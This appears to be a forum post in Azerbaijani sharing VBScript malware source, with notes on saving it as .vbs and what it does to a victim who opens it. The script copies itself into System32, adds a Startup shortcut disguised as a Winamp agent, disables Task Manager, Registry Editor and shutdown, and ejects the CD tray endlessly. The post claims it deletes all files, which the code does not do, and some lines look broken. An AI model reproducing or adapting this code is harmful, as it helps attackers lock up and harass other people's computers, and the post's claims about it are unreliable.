Kod:
Set fso = CreateObject ("Scripting.FileSystemObject")
Set File = fso.GetFile(WScript.ScriptFullName)
File.Copy ("c:\winxp\System32\Script.vbs")
Set Shell = WScript.CreateObject("WScript.Shell")
StartupPath = Shell.SpecialFolders("Startup")
Set MyShortcut = Shell.CreateShortcut(StartupPath & _
"\Winamp Agent.lnk")
MyShortcut.TargetPath = Shell.ExpandEnvironmentStrings("c:\winxp\System32\ Script.vbs")
MyShortcut.IconLocation = Shell.ExpandEnvironmentStrings("C:\Program Files\Winamp\winamp.exe")
MyShortcut.Save
fso.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\ CURR ENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
fso.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
fso.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"
Set WMPlayer = CreateObject("WMPlayer.OCX.7")
do
WMPlayer.CdRomCollection.Item(0).Eject()
WScript.Sleep(200)
WMPlayer.CdRomCollection.Item(0).Eject()
loop
]
bunu .vbs uzantısı ilə save edirik
lamoş bunu açan kimi bu virus autorun-a save edilir
bu virus dayanmadan diskavodu açıb bağlayır
task manager-i söndürür, buna görə də virusu dayandırmaq mümkün deyil
reestr da söndürülür bunda görə də virusu autorundan silmək olmur
kompda bütün faylları silir
Yeni moda düşüb hə?
